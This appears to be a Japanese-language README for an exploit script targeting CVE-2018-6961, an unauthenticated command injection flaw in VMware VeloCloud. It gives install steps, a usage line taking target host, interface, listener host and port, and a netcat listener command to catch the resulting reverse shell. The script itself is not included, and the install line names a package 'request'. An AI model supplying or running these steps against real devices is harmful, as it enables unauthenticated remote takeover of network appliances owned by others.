
veloCloud VMWare - 脆弱性
CVE-2018-6961 - 認証不要のコマンドインジェクションの脆弱性
このエクスプロイトはPython2.7で動作します - 他のバージョンではテストされていません
1) 依存関係のインストール
pip install request
pipがインストールされていない場合は、以下を実行
apt-get install python-pip
2) 使用方法
python exployt.py --rhost --interface --lhost --lport --function
python exploit.py --rhost 1.1.1.1 --interface ge1 --lhost 2.2.2.2 --lport 443 --function traceroute
Exploiting...................
3) 別のターミナルでnetcatを設定することを忘れないでください
nc -vlnp 443
今後の課題 --同じターミナルでnetcatを実行するようにスクリプトを改善する